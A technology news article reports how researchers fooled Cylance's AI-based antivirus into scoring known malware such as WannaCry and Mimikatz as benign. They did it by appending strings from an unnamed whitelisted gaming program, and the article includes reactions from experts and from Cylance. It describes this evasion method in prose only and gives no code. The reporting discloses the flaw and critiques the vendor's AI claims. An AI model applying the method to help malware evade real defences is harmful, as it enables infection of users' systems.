Tech

Researchers Easily Trick Cylance's AI-Based Antivirus Into Thinking Malware Is 'Goodware'

By taking strings from an online gaming program and appending them to malicious files, researchers were able to trick Cylance’s AI-based antivirus engine into thinking programs like WannaCry and other malware are benign.
antivirus
Image: Cathryn Virginia

Artificial intelligence has been touted by some in the security community as the silver bullet in malware detection. Its proponents say it’s superior to traditional antivirus since it can catch new variants and never-before-seen malware—think zero-day exploits—that are the Achilles heel of antivirus. One of its biggest proponents is the security firm BlackBerry Cylance, which has staked its business model on the artificial intelligence engine in its endpoint PROTECT detection system, which the company says has the ability to detect new malicious files two years before their authors even create them.

Advertisement

But researchers in Australia say they’ve found a way to subvert the machine-learning algorithm in PROTECT and cause it to falsely tag already known malware as “goodware.” The method doesn’t involve altering the malicious code, as hackers generally do to evade detection. Instead, the researchers developed a “global bypass” method that works with almost any malware to fool the Cylance engine. It involves simply taking strings from a non-malicious file and appending them to a malicious one, tricking the system into thinking the malicious file is benign.

The benign strings they used came from an online gaming program, which they have declined to name publicly so that Cylance will have a chance to fix the problem before hackers exploit it.

“As far as I know, this is a world-first, proven global attack on the ML [machine learning] mechanism of a security company,” says Adi Ashkenazy, CEO of the Sydney-based company Skylight Cyber, who conducted the research with CTO Shahar Zini. “After around four years of super hype [about AI], I think this is a humbling example of how the approach provides a new attack surface that was not possible with legacy [antivirus software].”

The method works because Cylance’s machine-learning algorithm has a bias toward the benign file that causes it to ignore any malicious code and features in a malicious file if it also sees strings from the benign file attached to a malicious file—essentially overriding the correct conclusion the detection engine should otherwise make. The trick works even if the Cylance engine previously concluded the same file was malicious, before the benign strings were appended to it.

Advertisement

The researchers tested their attack against the WannaCry ransomware that crippled hospitals and businesses around the world in 2017, as well as the more recent Samsam ransomware, the popular Mimikatz hacking tool, and hundreds of other known malicious files—adding the same benign strings from the gaming program to each malicious file—and in nearly all cases, they were able to trick the Cylance engine.

Martijn Grooten, editor of Virus Bulletin, which conducts tests and reviews of malware detection programs, called the reverse-engineering research impressive and technically interesting, but wasn’t surprised by the findings.

“Their crime is not that they coded AI poorly. Their crime is calling what they did AI."

“This is how AI works. If you make it look like benign files, then you can do this,” Grooten told Motherboard. “It mostly shows that you can’t rely on AI on its own…. AI isn’t a silver bullet…. I suspect it’ll get better at this kind of thing over time.”

A machine learning expert Motherboard spoke to agrees.

“Usually you try to work with machine learning to cover … things which are widely unknown or you cannot do manually,” said the expert, who asked to remain anonymous because his company doesn’t authorize him to speak with media. “And it usually works pretty well, until you have some corner cases where you can’t just make the model [work].”

Though he doesn’t fault Cylance for making a mistake, he does fault the company for hyping the AI in their marketing when the system contains a bias that essentially undermines the AI.

Advertisement

“Their crime is not that they coded AI poorly. Their crime is calling what they did AI,” he told Motherboard.

Cylance ranks about eight among the top ten endpoint security companies, after Symantec, Kaspersky and TrendMicro. But the company’s business is growing rapidly; last year it obtained $120 million in funding and this year was acquired by BlackBerry in a $1.4 billion deal.

Cylance’s PROTECT isn’t the only security product that uses artificial intelligence. Other firms like Symantec, Crowdstrike, and Darktrace use it too, but Ashkenazy and Zini didn’t test those systems and it’s not clear they would suffer from the same bias, since they’re architected differently and don’t rely as heavily on machine learning to detect malicious files as the Cylance system does.

“One of [Cylance’s] selling points… they say no more running after signatures and updates. We train the model once, and … you won’t have to train the model again for a couple of years. It’s very compelling, if it actually works,” Ashkenazy said.

But to fix the problem he and his colleague found in the Cylance engine, the company will have to retrain the system, which could be a “costly and complex process” Ashkenazy said.

Artificial intelligence has several advantages over traditional antivirus. In traditional systems, the vendor has to analyze each new file and push out new signatures or heuristics to their scanners to detect it. (Signatures look for specific strings of code or data that are unique to a piece of malware; heuristics look at the activity the code is engaged in to spot actions that are characteristic of malware.) But, according to Cylance, its engine doesn’t require an update every time new malware, or variants of existing malware, are discovered. Machine-learning detection systems are supposed to recognize not only known malicious files and activity but also spot new ones.

Advertisement

In a test conducted by SELabs and commissioned by Cylance, a version of its 2015 software had the ability to detect variants of the Cerber ransomware and other malicious programs that didn’t appear in the wild until 2016 and 2018.

To determine if a file is malicious or benign, the Cylance engine looks at 4 million different features or data points, according to Ryan Permeh, founder and chief scientist of Cylance. These include things like the size of the file, structural elements present, and entropy (the level of randomness), etc. Cylance programmers then “train” the engine by showing it about a billion malicious and benign files and tweak the system to hone its detection. But during training, the system also examines the files for patterns to see how malware variants evolve over time to anticipate how new malware might look—essentially “predicting” what malware authors will do before they do it. Models do get retrained, Permeh says, but only about every six months, and users only have to update their software if they want the latest features and performance improvements.

But none of this training and testing matter if the algorithm has a bias that is also training it to ignore what it learns from that other training. That’s essentially what the Skylight Cyber researchers discovered.

They purchased a copy of the Cylance program and reverse-engineered it to figure out what features or data points the agent was looking at to determine if a file is benign or malicious and they also studied how these features are weighed to arrive at the score the program gives each files.

Advertisement

The Cylance system analyzes each file based on these data points, and assigns a score to the file that ranges between -1,000 to 1,000 (with -1,000 being a file with the most or worst malicious features or data points in it). Scores are visible in the program’s log file.

When they saw how many features the program analyzes, the researchers worried initially that it would take them weeks or months to find the ones that carried the most weight in the algorithm’s decision process. That is, until they discovered that Cylance also had whitelisted certain families of executable files to avoid triggering false positives on legitimate software.

Suspecting the machine learning might be biased toward code in those whitelisted files, they extracted strings from an online gaming program Cylance had whitelisted and appended it to malicious files. The Cylance engine tagged the files benign and moved their scores from high negative numbers to high positive ones. The score for Mimikatz went from -799 to 998. WannaCry went from -1000 to 545. The researchers liken it to donning a mask with a beak and having a facial recognition system identify you as a bird, ignoring all other characteristics that indicate you’re just a person wearing an artificial beak.

They tested the top ten malware programs cited by the Center for Internet Security, then broadened their test to include 384 additional malicious files taken from online repositories of malware. The average score before they appended the benign strings from the whitelisted gaming program was -0.92. After adding the strings, the average score was 0.63. About 84 percent of the files bypassed detection once they added the gaming strings, though some files still got tagged malicious, but with significantly changed scores than before.

Advertisement

They didn’t just run the files against the static Cylance program - they executed the malicious files on a virtual machine with Cylance PROTECT running on it, to see if it would catch the malicious files in action. The theory was that even if the product was tricked by the strings, the malicious action of the file would still be detected by Cylance, but it wasn’t.

Ashkenazy said the use of whitelisting in an AI program is odd, but understands why Cylance did it, if its engine was creating false positives on those programs. The real problem, he said, was giving the whitelisted programs more weight in the algorithm’s scoring, causing them to override a decision the algorithm would normally reach if a file didn’t have the benign strings appended to it. He also said that not using backup signatures or heuristics to doublecheck the algorithm’s conclusion, and relying on the AI instead, caused the failures.

Permeh, who is also the architect of Cylance’s machine-learning engine, said they do use signatures and hard-coded heuristics in their product as well and don’t entirely rely on the machine-learning, but the AI does take precedence in detection.

He acknowledged to Motherboard the potential for the kind of bypass the researchers found, however.

“Generally speaking, in all of these AI scenarios, models are probabilistic. When you train one, you learn what’s good and what’s bad…. By training for what is a good file, we learn attributes of that… [and] it’s entirely possible that we overestimated the goodness of that,” he told Motherboard in a phone call. "One of the interesting parts of being basically the first to take an AI-first approach, is that we’re still learning. We invest a lot in adverse research, but this is still an evolution.”

Advertisement

Contrary to what Ashkenazy said, Permeh doesn’t think it will take long to retrain the algorithm to fix the issue once he knows the details of the global bypass. Ashkenazy didn’t contact Cylance before contacting Motherboard to disclose the issue.

But Ashkenazy thinks the issue will take more time to fix than Permeh believes.

“The bias towards games and those features is there for a reason,” Ashkenazy said. “They were getting false positives for games, so retraining without sacrificing accuracy or false positive rate can’t be that simple.”

In the end, Ashkenzy doesn’t think Cylance is at fault for using machine learning, just for hyping it and relying on it so heavily for detection.

“I actually think they did a decent job applying current AI technology to security,” he told Motherboard. “It just has inherent flaws, like the possibility of having an exploitable bias which becomes a global bypass with a costly fix.”

Subscribe to our new cybersecurity podcast, CYBER.